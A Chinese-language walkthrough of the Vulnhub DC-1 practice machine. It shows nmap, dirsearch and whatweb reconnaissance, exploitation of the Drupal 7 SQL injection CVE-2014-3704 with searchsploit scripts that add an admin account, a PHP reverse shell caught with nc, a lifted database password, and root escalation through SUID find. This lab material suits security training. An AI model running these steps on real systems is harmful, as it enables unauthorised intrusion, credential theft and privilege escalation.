【Vulnhub系列靶场】Vulnhub_DC-1靶场渗透

一、环境准备

1、在百度网盘中下载DC-1靶场。DC-1靶场受virtual box 的影响,在VM中直接打开是扫描不到IP 的,我们需要先解决这个问题:【其他经验】Vulnhub靶机扫描不到IP

2、之后在VM中打开.ovf 文件,设置存储路径和任意名称

3、开机之后修改网络连接模式为【NAT】即可

二、信息收集

1、主机发现

1
nmap.exe -sn 192.168.31.*

image-20240215190004853

2、端口扫描

1、粗略快速探测

1
nmap.exe -F 192.168.31.64

image-20240215190129699

2、精细化扫描

1
2
nmap.exe -sT --min-rate 10000 -p- 192.168.31.64
nmap.exe -sU --min-rate 10000 -p- 192.168.31.64

image-20240215193134231

image-20240215193153578

3、全扫描和漏洞探测

1
2
nmap.exe -sT -sV -sC -O -p22,80,111,45384,46146 192.168.31.64
nmap.exe --script=vuln -p22,80,111,45384,46146 192.168.31.64

image-20240215193925495

Debian 操作系统

image-20240215194229531

80端口发现:cve2014-3704漏洞、csrf 和一些敏感路径

3、web目录探测

1
dirsearch.cmd -u http://192.168.31.64 -x 404,403

image-20240215195553109

4、web框架探测

1
whatweb http://192.168.31.64	#在kali中使用

image-20240215200000848

使用了Drupal 7的框架

三、获取shell立足点

1、cve2014-3704 SQL注入

访问网站,确实是一个Drupal 7 框架的网站

image-20240215200945203

根据nmap 探测出来的cve2014-3704 ,在漏洞库中进行查询

1
漏洞影响:Drupal 7.0~7.31

image-20240215201224514

我们直接将这个数据包进行保存,修改Host 为靶机地址,抓包重放

image-20240215204441344

利用成功,存在SQL注入

2、登录后台

我们利用这个SQL漏洞进行手工注入太过于麻烦,我们去searchsploit 上搜索有关Drupal 7 的相关漏洞

1
searchsploit.cmd Drupal 7

image-20240215212739190

有四个符合版本信息,挨个尝试

1
cp exploits/php/webapps/34992.py /c/Users/Administrator/Desktop/test/

1、第一个是直接添加一个管理员用户的py脚本:34992.py

1
2
python2 34992.py -t http://192.168.31.64 -u admin123 -p admin123	
#添加一个账号密码均为admin123的管理员

image-20240215212853269

image-20240215213029437

admin123:admin123登录后台

image-20240215213315976

IP被加入黑名单了,我说怎么登录不了,我们稍等片刻。之后换了admin1234:admin1234,提示账号未激活不能使用。

image-20240216184714618

2、我们尝试第四个php脚本:34993.php

修改我们的靶机地址

image-20240216194806747

之后执行

image-20240216194833054

之后用admin:admin进行登录

image-20240216195221938

成功登录后台

3、获取shell立足点

在后台模块中开启PHP代码

image-20240216201525764

进行保存,提示成功

image-20240216201653827

我们随便找一篇文章进行修改

image-20240216201907601

选择PHP代码

image-20240216201934513

添加上PHP反弹shell代码

image-20240216202351688

用nc 成功接收到shell

image-20240216202503815

四、提权至root

1、敏感信息收集

1、www下的sites/default/settings.php 数据库配置文件

drupaldb数据库的账号密码:dbuser:R0ck3t

image-20240216203650477

2、/etc/passwd 文件

存在flag4 这个用户

image-20240216204206491

3、flag4.txt 文件

image-20240216204341256

2、find高权限提权

1
find / -user root -perm -4000 -print 2>/dev/null

查找高权限命令

image-20240216205000230

3、提权至root

采用find 进行提权,成功拿到root权限

1
find / -exec "/bin/sh" \;

image-20240216205312662